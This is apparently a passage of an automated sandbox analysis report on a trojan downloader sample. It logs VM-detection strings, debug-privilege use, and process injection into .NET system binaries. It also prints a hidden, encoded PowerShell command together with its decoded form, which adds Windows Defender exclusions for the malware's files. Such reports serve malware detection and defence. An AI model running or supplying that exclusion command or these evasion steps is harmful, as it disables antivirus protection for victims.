Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59614
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59333
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59211
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59101
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 58989
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 58875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 58765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 58645
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 58526
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 58422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 58304
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 58203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 58092
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 57984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 57874
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 57765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 57655
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 57547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 57434
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 57328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 57218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 57109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 57000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 56888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 56781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 56671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 56562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 56453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 56343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 56208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 56093
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 55975
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 55873
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 55765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 55656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 55547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 55434
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 55305
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 340000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59863
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59889
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59671
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59805
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59688
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59578
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59469
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59359
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59249
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59125
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59015
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 1200000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 1199866
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 1199765
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59885
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59766
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59641
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59508
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59391
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59282
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 599979
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 599875
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 599766
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59875
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59765
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59650
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59517
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59390
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59225
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 598860
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 598750
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 598611
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59890
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59781
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59672
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59547
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59438
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59309
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59191
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 597672
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 597560
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 597452
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59872
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59711
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59609
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 59472
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Thread delayed: delay time: 922337203685477
Source: fdyryi.exe, 00000010.00000002.2305476496.000001A956511000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: J8YHGfSiwDxaMEWn9MM
Source: pjmskbbdr.exe, 0000001B.00000002.2248679548.00000000032ED000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: pjmskbbdr.exe, 0000001B.00000002.2248679548.00000000032ED000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: Keywords.exe, 00000005.00000002.1525709825.0000000000D62000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
Source: fdyryi.exe, 0000000F.00000002.2256041815.0000029A71E31000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1441853513.00000000010D5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1613965775.0000000000CA6000.00000004.00000020.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.1814379314.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, AlgorithmType.exe, 00000014.00000002.1849729297.000001B8046EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: aspnet_compiler.exe, 00000017.00000002.1918380298.00000154E3EB5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^z
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Bypasses PowerShell execution policy
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGIAcgBvAGsAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABLAGUAeQB3AG8AcgBkAHMALgBlAHgAZQA7AA==
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\brok\AppData\Local,C:\Users\brok\AppData\Local\Temp\; Add-MpPreference -ExclusionProcess Keywords.exe;
Source: unknown Process created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\brok\AppData\Local,C:\Users\brok\AppData\Local\Temp\; Add-MpPreference -ExclusionProcess Keywords.exe;
Source: unknown Process created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\brok\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe,C:\Users\brok\AppData\Local\Temp\ -Force; Add-MpPreference -ExclusionProcess C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe,C:\Users\brok\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Memory written: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory written: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Memory written: C:\Users\user\AppData\Local\Temp\fdyryi.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory written: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Memory written: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Thread register set: target process: 3852
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Thread register set: target process: 6812
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Thread register set: target process: 5572
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread register set: target process: 4648
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread register set: target process: 3844
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Thread register set: target process: 2440
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 544000
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 548000
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 84F008
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 400000
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 402000
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 428000
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 42C000
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: A81F55010
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 8532F49010
